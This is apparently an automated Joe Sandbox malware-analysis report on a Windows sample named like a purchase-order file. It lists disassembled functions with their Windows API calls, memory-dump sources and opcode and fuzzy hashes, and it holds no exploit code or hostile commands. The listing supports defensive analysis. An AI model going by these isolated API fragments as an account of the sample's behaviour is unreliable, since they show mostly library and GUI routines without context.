Instruction Fuzzy Hash: 3811E131606011AFDB04AB54CC05FBE7799AF85324F14422EFC16D72E2DBB8AC008799

Function 00440AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00441E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441E77
Part of subcall function 00441E68: lstrcpyW.KERNEL32(00000000,?,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00441E9D
Part of subcall function 00441E68: lstrcmpiW.KERNEL32(00000000,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AD4
lstrcpyW.KERNEL32(00000000,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440B2E

Strings

cdecl, xrefs: 00440B25

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 0fe415cb91b5ec623ea961ea0cfd80b63da84bf6d69d8f0da9c5f2c7a7227f82
Instruction ID: c7304db2e455f905d58f141a894c6769a3b5098f9c982885bc3ade38f0d3ce7e
Opcode Fuzzy Hash: 0fe415cb91b5ec623ea961ea0cfd80b63da84bf6d69d8f0da9c5f2c7a7227f82
Instruction Fuzzy Hash: 95110636200344AFEB209F64CC05D7A77A8FF45354B80412FE905CB2A0EB75E851C7A8

Function 00432F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00432FB5

Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 58748fedd27582319160605c497609f39d126aafe53aaf3fe275afe370e88150
Instruction ID: 49a6a1f19b535ba8fc49ed021f10ce5f4a0a1db8662e9c22c6828818e7789cec
Opcode Fuzzy Hash: 58748fedd27582319160605c497609f39d126aafe53aaf3fe275afe370e88150
Instruction Fuzzy Hash: E5113D31609221ABCB313F71BC0462A3BA4AF18369F60592FF809C6261CB7CC840979C

Function 0044058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004405AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004405C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004405DD
FreeLibrary.KERNEL32(?), ref: 00440632

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction ID: edd6db39d660dcb4e0c32f863c5204c469b601a469209fca3a932210d4679436
Opcode Fuzzy Hash: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction Fuzzy Hash: 5021B471900208EFEB20DF95DC89ADBBBB8EF40704F00846EE61792150D778EA65DF59

Function 00446713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00446733
_memset.LIBCMT ref: 00446754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004467A6
CloseHandle.KERNEL32(00000000), ref: 004467AF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction ID: 8b91472a63e09bb99e4025de3935e9e18f15fd5f322b2290e887984ed070b48b
Opcode Fuzzy Hash: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction Fuzzy Hash: E5110A71D022287AE73067A5AC4DFAFBBBCEF45764F1045AAF904E71D0D2744E808B69

Function 0043B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
Part of subcall function 0043AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
Part of subcall function 0043AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
Part of subcall function 0043AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

GetLengthSid.ADVAPI32(?,00000000,0043ADE4,?,?), ref: 0043B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0043B227
HeapAlloc.KERNEL32(00000000), ref: 0043B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0043B247

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction ID: 573796cad2db7ff1302e17eb1794f716ba6f0da4f155cbbcd395141fd52a3640
Opcode Fuzzy Hash: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction Fuzzy Hash: BD11BF71A00205AFDB049F94DC88FAFB7B9EF89318F14946FEA4297250D739AE44CB54

Function 0043B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0043B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4DB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction ID: 8899dad3a5a672da7911a65e4843f6e45b4eb2c78a03a80d9270399c9af6d800
Opcode Fuzzy Hash: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction Fuzzy Hash: 9F11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604B7290D771AE11DB98

Function 0041B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5
GetClientRect.USER32(?,?), ref: 0047E69A
GetCursorPos.USER32(?), ref: 0047E6A4
ScreenToClient.USER32(?,?), ref: 0047E6AF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction ID: 8a38cf26b2289de6e14f6fa3ca0c761f9cf1d87495578927ec2939f6d18f8468
Opcode Fuzzy Hash: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction Fuzzy Hash: 0F114831A01029BFCB10DF95DC459EE77B9EF09308F40486AF901E7241D338AA92CBA9

Function 0044732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00447352
MessageBoxW.USER32(?,?,?,?), ref: 00447385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0044739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004473A2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction ID: 65718a7269fcb76229fcf2b12d524195cd6f7c0b01429baa910b87b3e570ebb2
Opcode Fuzzy Hash: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction Fuzzy Hash: 1911E572A04214ABDB019FAC9C05E9E7BA99B48311F14426AFC21D3291D7748D019BA9

Function 0041D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
GetStockObject.GDI32(00000011), ref: 0041D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction ID: 20e8855dbb7d0dd181b5275668110b09493867f9601d5c4c54c49d70e43e613b
Opcode Fuzzy Hash: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction Fuzzy Hash: 4111C4B2901509BFEF125F90DC54EEB7B69FF08364F044116FA0552150C735DCA0DBA4

Function 00AF218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AF15D8,00000000,00000000,?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue), ref: 00AF21BD
GetLastError.KERNEL32(?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue,00B06FC4,FlsSetValue,00000000,00000364,?,00AF192D), ref: 00AF21C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue,00B06FC4,FlsSetValue,00000000), ref: 00AF21D7

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 56fd52f87146f362977e9b2eafd77492e1cb14d7156d2285c3758c1ac5b55d3e
Instruction ID: 9e050bca18593d3673dd78942eedae9a8ea48250e1da78b5a125856666118826
Opcode Fuzzy Hash: 56fd52f87146f362977e9b2eafd77492e1cb14d7156d2285c3758c1ac5b55d3e
Instruction Fuzzy Hash: 1D01F77260122AABC7218BE8EC44BB67B9CAF15BA0B210720FB19D3140DB24D801C7F8

Function 00434DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00434E16

Part of subcall function 004354F5: __fltout2.LIBCMT ref: 0043551E

__cftog_l.LIBCMT ref: 00434E3C
__cftoe_l.LIBCMT ref: 00434E6E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: e217e9a68c89cc3a703717b2c0a853f5b8c9668b7614545f64a0a403a3b518ad
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: AC014C3200014EBBCF125E84DC028EE3F23BB5C355F589456FE1859135D33AEAB2AB89

Function 00427452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427A0D: __getptd_noexit.LIBCMT ref: 00427A0E

__lock.LIBCMT ref: 0042748F
InterlockedDecrement.KERNEL32(?), ref: 004274AC
_free.LIBCMT ref: 004274BF
InterlockedIncrement.KERNEL32(00BEB880), ref: 004274D7

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
Instruction ID: de51e5ee548e769ed021d111760f6c39ee054f2497822ded0c01ceae259c3d71
Opcode Fuzzy Hash: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
Instruction Fuzzy Hash: 0D018E31B06631A7C711BF66B80575EBB60BF04714F95411FE81563690C72C6911CBDE

Function 0046EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EA8E
LineTo.GDI32(00000000,?,?), ref: 0046EA9B
EndPath.GDI32(00000000), ref: 0046EAAB
StrokePath.GDI32(00000000), ref: 0046EAB9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction ID: 7d6768de46838a1e0420bdc3075050136730bf049448a9ce4948047e77d7b045
Opcode Fuzzy Hash: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction Fuzzy Hash: 9FF0BE31502259BBDB12AF94AC0DFCE3F5AAF06314F044216FA01640F183785562CB9E

Function 0043C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
GetCurrentThreadId.KERNEL32 ref: 0043C864
AttachThreadInput.USER32(00000000), ref: 0043C86B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction ID: be0358667f426e6c30f78aba5f721580d23a9c17b88f7cc5dcbf179fbb72207b
Opcode Fuzzy Hash: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction Fuzzy Hash: 10E0657154222876DB102BA2DC4DEDF7F1CEF157A1F008425B50DA4490D775C581CBE4

Function 0043B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0043B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0043AC9D), ref: 0043B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0F1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction ID: d5ae466aed75c77a4d15beb372450120c68d71961851cf8e8349648a48651166
Opcode Fuzzy Hash: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction Fuzzy Hash: C8E04F32A022119BD7202FB15C0CB4B3BA9EF55795F118C2CA641D6080DA2884018769

Function 0041B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0041B496
SetTextColor.GDI32(?,000000FF), ref: 0041B4A0
